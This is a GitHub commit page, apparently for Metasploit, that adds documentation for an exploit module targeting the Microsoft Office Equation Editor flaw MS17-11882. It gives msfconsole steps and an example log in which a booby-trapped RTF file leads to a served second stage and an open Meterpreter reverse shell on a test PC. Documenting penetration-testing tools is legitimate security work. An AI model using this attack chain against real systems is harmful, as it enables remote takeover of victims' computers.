-
Notifications
You must be signed in to change notification settings - Fork 13.8k
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Land #9226, Microsoft Office OLE object memory corruption
- Loading branch information
Showing
2 changed files
with
368 additions
and
0 deletions.
There are no files selected for viewing
53 changes: 53 additions & 0 deletions
53
documentation/modules/exploit/windows/fileformat/office_ms17_11882.md
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,53 @@ | ||
|
||
Module exploits a flaw in how the Equation Editor that allows an attacker to execute arbitrary code in RTF files without interaction. The vulnerability is caused by the Equation Editor, to which fails to properly handle OLE objects in memory. | ||
|
||
## Vulnerable Application | ||
|
||
- Microsoft Office 2016 | ||
- Microsoft Office 2013 Service Pack 1 | ||
- Microsoft Office 2010 Service Pack 2 | ||
- Microsoft Office 2007 | ||
|
||
## Verification Steps | ||
|
||
1. Start msfconsole | ||
2. Do: `use exploit/windows/fileformat/office_ms17_11882` | ||
3. Do: `set PAYLOAD [PAYLOAD]` | ||
4. Do: `run` | ||
|
||
## Options | ||
### FILENAME | ||
Filename to output, and location to which should be written. | ||
|
||
|
||
## Example | ||
|
||
``` | ||
msf > use exploit/windows/fileformat/office_ms17_11882 | ||
msf exploit(office_ms17_11882) > set FILENAME msf.rtf | ||
FILENAME => /home/mumbai/file.rtf | ||
msf exploit(office_ms17_11882) > set LHOST ens3 | ||
LHOST => ens3 | ||
msf exploit(office_ms17_11882) > set LPORT 35116 | ||
LPORT => 35116 | ||
msf exploit(office_ms17_11882) > run | ||
[*] Using URL: http://0.0.0.0:8080/BUY0DYgc | ||
[*] Local IP: http://192.1668.0.11:8080/BUY0DYgc | ||
[*] Server started. | ||
[*] 192.168.0.24 office_ms17_11882 - Handling initial request from 192.168.0.24 | ||
[*] 192.168.0.24 office_ms17_11882 - Stage two requestd, sending | ||
[*] Sending stage (205379 bytes) to 192.168.0.24 | ||
[*] Meterpreter session 1 opened (192.168.0.11:35116 -> 192.168.0.24:52217) at 2017-11-21 14:41:59 -0500 | ||
sessions -i 1 | ||
[*] Starting interaction with 1... | ||
meterpreter > sysinfo | ||
Computer : TEST-PC | ||
OS : Windows 7 (Build 7601, Service Pack 1). | ||
Architecture : x64 | ||
System Language : en_US | ||
Domain : WORKGROUP | ||
Logged On Users : 1 | ||
Meterpreter : x64/windows | ||
meterpreter > | ||
``` |
Oops, something went wrong.